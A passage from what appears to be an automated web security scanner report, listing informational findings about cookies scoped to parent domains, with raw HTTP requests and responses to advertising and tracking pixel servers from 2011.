oTibsji3sVzNQzfkIJo1LEF1z7701aurKcGIIyYgVxrloABacahXq/Ckw8NcwvJGclRMzEmcIJ5KsxUFR4zynbONfhk//QMFIs0f948ePudxN1zPw6UVAdDYqpRYvHQo0EjST1TVhNaCBRjEbPPjwYbD1H8rGLmFC8+5rCsDt5DAFMr11/jsEWaaeh5jmD4IZLV7HnYac97sKKMm87usSK+qwCZvqO8FAq6SMLqOQp4pdu3qjzzZfxkmj1yYZK5rX3ueSZ5im7eKEAR2ivqUf14W3a+jPcNN7jn+lBDenCKYTsI2UHmKPjjYM9ItpZgr23PwZo0Qj+w6Qxr2+SLbNSRfEhyPDlStkVOaXRL82ELXFpkI292WNIWl/kw/UGrbcwSnHVycDL1LqO6SAxM1XA7+Bfm3qlit3MWvkBFO4YvTZ7jPKnzvQpsNRrtynBzQXJ3EULenVbdm1Z2XNYEQSpejpAgfvjN0W3SO9NW64LUXVscn4+mQHvT6iwuWe+bEsn4u2ZYI807tt2pRK+61OI952t5g+PbC01/Z3uVyvF8deFb9TNvHwOMA6AwViI10J+5DtA==; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_cer_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP15EOheQIMp6b81kYFwpyB7qEdw7duSjkNTahpEt86nzU5ngw7cTFl7XVNzj9gP1CimrFlL4I0pMbllsZSDDizv11Yd4W9jzyyi4YqtNPFNTnpxPohouutFRxl+63IU2Hqy71trPYPR9Zo4aPnsPUWRQfFtTe3u8hMKPQ4Jc6t37oC7abCUfEsDg5F7Vmzy5irDuGQ/HuwzYAX78HWEoPSjOa1b2fEkOddDegqkcWnYPDxwWxphx/JehZ0Pioxa3Tx7VOsG0z0XYHfcpcQY5ye2VaBmYiGib4m85UczXLzccHnCcd3GYfIjua8XrcLzVYD0bPpBTwqmG2t4z6nZjn0yf5WR4e2ehEtJgTj7H985kmKXktoMBTBNbIskN0905VOTN5R4THwyBJ75VDIW9ZhWBIe3bYmqZkp24mQJLdrQYjFXEmhp8bzNA+b+ZmygmhrgBIY28g9wUTwOzbAhpq0/DiL6+jAJfwuBSa25nR/ak/++FGbESaBrwuiZ6yc7XTPOg==; Domain=.revsci.net; Expires=Sun, 06-May-2012 11:25:03 GMT; Path=/
Set-Cookie: NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160f&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Sat, 04-Jun-2011 11:25:03 GMT; Path=/
Set-Cookie: rtc_ILqw=MLsXtzE1ZxpnJ5GrHvmWF/KWrPo31Agpb5slCPedGNAwVTi74gkGz+Ioj4EWp+/DHqged2X1aG4UUDn9Sek+jWM8PzolTSqS7RsUjlJjpOBJV4OQhg8QGT4qzmd32wLpi/idGBjih+awrUoKWaJ0K1B1Lomb0QkvRD26c4T9RWug2cO4FjzKAUk/0qUcoDTyVussQkDgGXRawu/DgYy8AQYowPQYovmciLKxDbxy63oR0tY9ui/NiCYn/cnzTG4mUrhXRSpVst8UQQg9UDg0tgeixM8uBejqsKnVnMHc9P9FTM7x/ggwgrQzGUjVo6BefFXgFaQMIq+AXZcR/zpqBBsaLusDfUMdaCoeRbtAAVUE2mPvTEZu/93IB+zgKsSSVbDbVKROB1dqyeuXojAa7aHmb6eu+5ZmujQ0hRHn3xtEalcmuMeIg3WRnEijYtYALyQhp73E6VAmilQtoTPiNnBpnYBOsQoPgwgptLgSn07OG+jh5lrW7RTgIKy6MXkkmkQhCWZXO5mYNKzaRPm5xTNWXdC2579VbAg5n3aFD4xHuBpLc1V4ElYMePMZdeAdlgtT0E6Bx+Nlet6sPh5w2kN9EGCAsoXpjef+SbJ6yj1XtqK/Ti4AW2t0WrjxZ+ZdhqeYyX2/xogbUb/mgHumrix8fG9wK1NOIuNbpYW55sLR+aqooY9f7I2Zb0/Y4FhxjSKXWeh8Wap9wk65kZYLh9kAq0vrvz5Qi9Q/ZEgsrAd+fuTGh+Rs0UYPCj/jKhV2sOX+dhl0rauwPPPDupVHqmA11y8OaIDcpDa40Ec+aQmnD1Fg27ft7srSL4do5uyHD6m6pzT5gt/lh1IEBu7j624K+xXaxFrGmoe9um+HHVewxEiqK1yBPju68o7c4sEE6uv1R7tqhcphC80uE6bJsLcvZGgmVNLQoRmZu+19T6S/xFwIm0CESwJweNmTY93I8wQWuSkfvZPw3CXLkLuMOgDCuaebRsxiEO6Ve6CksLxbQx9Y5wo/Y6ljLXS6W8TuXPg8Ajn5DU+Gi7u6DUWdBc3GEgPZ4yACxIzv1Ht2Sa9lB0jhrHo/7Az8dBX7jueoWaMLanZ233NKdMdp+CJe8rutyK9A4GiO/JUhmI9K6dIDyOLSc4CAUt8mYfqlj3OYYg5jHXX8T05v6nQrJDyj95cvG4Z4jCeVWfvZ67L9q8UCKCd8w/lnvZvmyZKJJHPmUsWaIp/R8cDID5iXMFfc7AjdPWSXxeIYwJg9CwbkPsH6kXw8r0Oqf+XkEFay3UyruKRLC/1ue7DUS06B9fKLJFdj1f9LkA1cTpsnTLax8shJVlffoxUmGUzIDD92ECFG+DvSakohNl+OCiyZe+o3RcTToFAQ07UwbeMPaqA3lvSgwmqNpCpclQXSYtB1HznkXyZTA53rtFtSU+gRUvyL7AbO5Nev/zyDtnqcR5ujoU8PPUHYK7LfI3Ikvsuf5Q1AXNSohTIoIOj09vCTD62+I86CBu6sVVo=; Domain=.revsci.net; Expires=Sun, 06-May-2012 11:25:03 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sat, 07 May 2011 11:25:03 GMT

GIF89a.............!.......,...........D..;
17.36. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=571074855;fpan=0;fpa=P0-87169230-1303163602430;ns=0;url=http%3A%2F%2Fwww.linkedin.com%2Fpub%2Fsocial-follow%2F12%2F7a2%2F294;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304721583769;tzo=300;a=p-b3sGjMtCFrexE HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.linkedin.com/pub/social-follow/12/7a2/294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EDkAGO8kjVmtjIMIufKMgQGxAQHXBoGUAJrRo6lXiz0cxeKLPR1KLMUgsqNMEf4RDCAMHxCCDxAwQBhaKIEbtgqRksdDECEYILsywS0zgSggMC4a4w_xkgDokgDhAL4gtksQgtGLKxlKOLIw

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1099177&id=669181&id=734723&id=1157704&t=2
Set-Cookie: d=EM0AGO8kjVmtjIMIufKMgQG9AQHXBoGUAJrRo5lYEPGaOCbTzF4os9HUosxSCyo0wR_hEMIAwfEIIPEDBAGFoogRu2CpGSx0MQIRgguzLBLTOBKCAwLh6DS1OvFE0gDokgDhAL4gtksQgtGLKxlKOLIw; expires=Thu, 04-Aug-2011 17:39:45 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Fri, 06 May 2011 17:39:45 GMT
Server: QS

17.37. http://pts.eyewonder.com/ewr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pts.eyewonder.com
Path:   /ewr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ewr?cid=20019204&versionid=19 HTTP/1.1
Host: pts.eyewonder.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=10295:2568/17671:21707

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ew=MDAwMTMwMzI5Njc5OTg5MjAwMTY0NTQwMjBfMTMwNDcxMDMxMzMxMl8xMDBfX18w; Domain=.eyewonder.com; Expires=Fri, 01-Jul-2011 19:31:53 GMT; Path=/
Set-Cookie: ewroi=""; Domain=.eyewonder.com; Expires=Fri, 01-Jul-2011 19:31:53 GMT; Path=/
P3P: CP="NON DSP COR NID CURa PSAa PSDa OUR STP UNI COM NAV STA LOC OTC", policyref="http://pts.eyewonder.com/static/ew/w3c/p3p_eyewonder.xml"
gmtdiid: 8a9f17852f9b8836012fa35146a40689
Content-Type: text/javascript;charset=US-ASCII
Date: Fri, 06 May 2011 19:31:52 GMT
Content-Length: 442
Connection: keep-alive

/*CreatedOn:1304710313312*/var ew20019204_dynamicAdModel={acid:0,adid:201806,eid:20019204,tid:0,emv:2,uid:'00013032967998920016454020',vid:'001303296799892000000034480857',trk:'',geo:{city:'Dallas',re
...[SNIP]...
17.38. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=40809&partnerID=228&clientID=4714&key=segment&pb=0 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgCJ734Mk9/sBmQe7GYHkoSMgjUdzgMzjT0AmnQCTJ8Hmnc4BEudAche+g0Qv7gWRTy6ANL7YzQwk34LJdwdA7vvHASLCAdDNM/A="

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:13:30 GMT
Set-Cookie: segments_p1=eJzjYuZYEMzFzHE0h4uF48QTJiB5sJsRSE56ygQUbowAEudygMRpkILjYAU7djECBf6FA5l734OY042BzDk/QHLvDjADyc4OEDn3B8iIiSpA5ovdzFxcHDv3MQscOrjsHQsXEwcHUGpjMVDqyQWQdSfBut/uBum78B3EPnQERM4Eizf/B5n0jwPIbAIz9/sBmRf3guRe7gORa/czAgDZyTWv;Path=/;Domain=invitemedia.com;Expires=Sat, 05-May-2012 19:13:30 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Content-Length: 43
Connection: close
Server: Jetty(7.3.1.v20110307)

GIF89a.............!.......,...........D..;
17.39. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543557/sid.6543598/sid.6543551  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /v1/tpix/-/-/-/-/-/sid.6543557/sid.6543598/sid.6543551

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6543557/sid.6543598/sid.6543551 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; DRN1=AGPX0VFwToY

Response

HTTP/1.1 302 Found
Date: Sat, 07 May 2011 01:31:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; expires=Sat, 05-May-2012 01:31:05 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1Nk; expires=Mon, 06-May-2013 01:31:05 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

17.40. http://serw.clicksor.com/newServing/tracking_id.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serw.clicksor.com
Path:   /newServing/tracking_id.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newServing/tracking_id.php?b=1&UID=13046968344368&TRSTR=1&RTID= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: serw.clicksor.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:47:14 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.5
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: TRUID=13046968344368; expires=Thu, 01-Mar-2012 15:47:14 GMT; path=/; domain=.clicksor.com
Set-Cookie: CKTIME=1304696834; expires=Thu, 01-Mar-2012 15:47:14 GMT; path=/; domain=.clicksor.com
Set-Cookie: RTID=deleted; expires=Thu, 06-May-2010 15:47:13 GMT; path=/; domain=.clicksor.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

17.41. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=10002&redir=http://tags.bluekai.com/site/2948?phint=idswap_partner=bk&id=PARTNER_UUID HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=9b6b0&phint=ord=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304360412; ts=1304525946

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x4 pid 0x412d 16685
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 07 May 2011 11:25:04 GMT
Location: http://tags.bluekai.com/site/2948?phint=idswap_partner=bk
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1304767504; domain=.mathtag.com; path=/; expires=Sun, 06-May-2012 11:25:04 GMT
Content-Length: 0

17.42. http://tags.bluekai.com/site/2576  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2576

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=naush555;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bko=KJ0E8VBQrncbQvXuQ0uDJzQxJLM9R1mdp8KHRH/q96BJpDa4EQRqGJQoV10qaXJiRAiWLoQj3GObE0fj9jxNjZ5Qt95ZlKsabsPiD/Vp9/hpszW=; bkst=KJh5Mp2ny69RhZXGYeSNQbBxcaye2dK2mlYyNkQPuG7HMGGUnArQcVGuWz5IQrnAnGGGnG/m/rMQfmJ7zcOhzdVu34CmhdwX7F52gGSK88sqibrUUQt2r4zvioZk9gMNoEns8TAPFLWW4stBPPjCeoCBFITzdIcTmjxB6IsGs/oZrKncuRr/ux0QvKBuW1WW1vWwFY57BILpi5D36S+UYDb6GC0Goa09JOEDVZPwjCwcjb2mm74u1+JCKOnF2DVtHqKw8cgvXt8W/yNj6rImGTlmqIFOLjKmUDv55C9aFDs/QbpReUqAmeLW6XfcXKRGgUGNFnJWKjyoyWHEvoDgx2E6I2qjgxjYcigbNCE+Dfb4elnFripltuiqu9OCOOKR6/HQM/NmRQnvzvwMOsn2d7MFtJra4Ndd9NrqRq1=; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnh19EJPemz9avYen5BWEnqQsylpA3sYIyQ1E+nWJ7Jn0lmyvO3yzeQha7BG1qWy1eYAmXaAo7sd9sGQLzvS9yehexKWO1GX82cJGsHxHBJCQLr/bUm0v9BkiAO0pOYjEC8o8Ly1rQM0EYC0OuYj/9rI1//YGByKTxnFsyH27YMtcwqeZWS1TooqZe2NP9hjelrRJAuaOAtlo38M9p+eQy1SHnPeYkQLHzmWOzXOqG9PKRkAG0OW0xVxYfQjsOpHGHNee9VsUQgsPTyQl0blQ6uNA0Pe9hfAVuRsHRM0Uppxeq+794YB9YWAATJ; bk=bhbvxbkYUciVIHOf; bkc=KJh56gNnxkWROFe7bmNe1N0vy1vQpYvixuyGkthgrsL6BWuT+W5DsBy/AjGvJYaGfrmYeuTBJKg46O9WDA7xWBHuNaE7FUsX2plMMdrX8pf7yyGO6DsOISIStRRDnm71eoiUe55N9Pha9awSChfcJztDPpft92rpyc3tjLowMM2ZraX6c6Npct3Z2jPdjqIaQLY2UVN8R/DfwzA5sKVIMUw4hqE84EeEd8DwrrHImQxv7hUEMNfcf8Gog2yj9OG8KzjthjA7ft8yV8ooUMAHOo3w9GrUgoX6DNfjeQnk1MOtfM3PTbSXzgxqVOGHYc7XaQzp8jPF8nhHO6fmUmKcrYZFFYqf4EzaoL/P6TOyccdZc+RXn+IMNfT+fr9Z2IL35lX4BdPHBrU2dOQYzIcd4rEWOJQogh0xI0XZOzGUN06lR+p6Ug0ZKKPtb5voQmNhP71CbEGQpb2SOcBZMp++zEFlbk7F/zqUol8KDpdkw6Ixtv/=

Response

HTTP/1.0 200 OK
Date: Fri, 06 May 2011 22:33:36 GMT
Set-Cookie: bklc=4dc47740; expires=Sun, 08-May-2011 22:33:36 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=hClmGTTKarbVIHOf; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XXgHaWDOdeFBzIwsSmjhDQBMV/1uzG6aeqsprJ+LqYxjZ1FFbJsAkijZAyoSp2KMzPLnJCZJ7IYCPnYoYyDstnawRdgFUmU7d3KzX228fbQe8Mm9sBnPbR9WJuK6M0orUbnK0eWwV1TEFrOunF9IW4jg1VGf5xbZYZFUJaajtc9kv8O0cjK1IVP2pl9bQiyLaStp0mdeU1dSzT1zK2ooFfvllvIiSp9MPUb52LL5fv4m2pB4H7MFG832E+QoFmP5hFk4KGaLr2a6TBZtbISvSdzT9Ur8c8uP+srJtXLz3zNDfN0w9ODfyDZEh6dSvSXLiUlUuQ9wzKmHfKTvSXzSjnFgDF9fdJne10DPfbx2DRameC0FBlOEU7kKE74jNPQ1a96exMqLD4rELt2XMtbUqwYfPFZ4ofMqZlCo7ZDEqZ4n6BQnw9fcp7KOtqf4dZpP2Tdkh9G7JpdI0fvEKdaqSoUgowmcyoRn32opiRzKIUlvIU97BgAE3S8fqtbI+NsKUISpttSEdAcBGw7lx==; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0qh1q9TaOIhJKnTxTF96BJpDa4JQjPmWrVMTcChrGeFAG1AkYV/WmR/9mee4XIU6Rss0ena1p08GVyZOQuGuhZCi3QMoBn5QOkM5AjswSOVxYgmOZ1; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNv96WDCSz/YsjMYALCVBQrpmI5sqO/Ms+DYsa5ESAT0tyEu/3Tr0vVwAsyLC5aaO+OYNWDLqqhsuhLfs05luoT3X+lpgkpoG/Kj8sqLTr7qQD2rl6sozwOzJxwZdZqxbXmnSsRVu39VNX3Rl0KVmWqE1eUNkCkaKS9tKEghFAdoAI/K7cNhba8hYxs6JHhvRCQ9oMxr2beAIFP3zH0ZKCV0yx7VkWmPa/rxO/v3k7vJ2mJQI1UC6T5VAxbe9dMfj8/NI7sFkyjXvyE6DCeZFxbTtiNd5rTz28p8NN9fPRxO5NIi/16lyGt8EM592wvhFcSSaet37kaiKJhoQ9EESkDgQhHAI2gJp53YcAGfNZE+TfTE+qwF1rilsK+SY/OCOazRW/EQMWtmGAJv1mBMCm/24F2g4BKp4lfICdG+t54; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhM6tJQRmY3jK9YDA/1MdxjsOQjmnAmEs5QI9KV3VETOSHRsHnzWeJq5YW0/eNzeBK1Wev7AsuTs4Ti0UQRQZu3sDT9vDsstbR/ZVN9+C+7Jz1a5oYR7uV/pmuUaZ5QDnPQRceigsjxRtJQRsc/2ynJEswI9aEORyD6CQaisQI/YjE8p0mEy1iQiuEeOjKHDZ5A69qnk/OksvW07npEEHQj2JaAZaOAYAW0xO5XRxuaxqQ2yQPK+QCfracLrVtc1/6jhExlLw833Oi0c7KyE9ZveO+FpPhsC7RcOGR6iV3saneRYyK/Y8TYUR93XhJJhL9JWQLQal90LeAMyMGss/L1FJD1n8COwklFOQkgoAGsCgN/1Ly1i8aAF7AQZlqm9tWS9njCDPQ=; expires=Wed, 02-Nov-2011 22:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 07-May-2011 22:33:36 GMT; path=/; domain=.bluekai.com
BK-Server: a96f
Content-Length: 239
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://d.xp1.ru4.com/activity?_o=62795&_t=cm_bk&redirect=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2751%3Fid%3d%7euk%7e" width=1 height=1 bor
...[SNIP]...
17.43. http://tags.bluekai.com/site/2751  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2751

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2751?id=AM-00000000030620452 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
